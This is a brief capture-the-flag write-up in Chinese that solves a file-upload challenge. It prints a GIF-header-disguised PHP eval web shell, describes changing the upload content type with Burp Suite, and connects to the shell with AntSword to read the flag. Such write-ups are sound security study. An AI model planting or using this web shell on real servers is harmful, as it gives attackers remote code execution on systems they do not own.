看到题目让我们上传图片
先随便上传一张图片但是进去后什么也没有,提示没有图像
写一段带gif图片头的一句话木马保存文件并命名为a.phtml
GIF89a? <script language="php">eval($_REQUEST[a])</script>
上传文件的同时用BS抓包再更改一下类型再放包
放包同步到浏览器显示文件名上传成功!
用蚁剑连接upload目录下的地址找到flag存在的文件夹
能检测到一句话木马的路径猜测是upload目录下的a.phtml中,连接密码为a
flag就在根目录下
flag{91894bb6-3abc-4d7e-9d38-43ede41e8a22}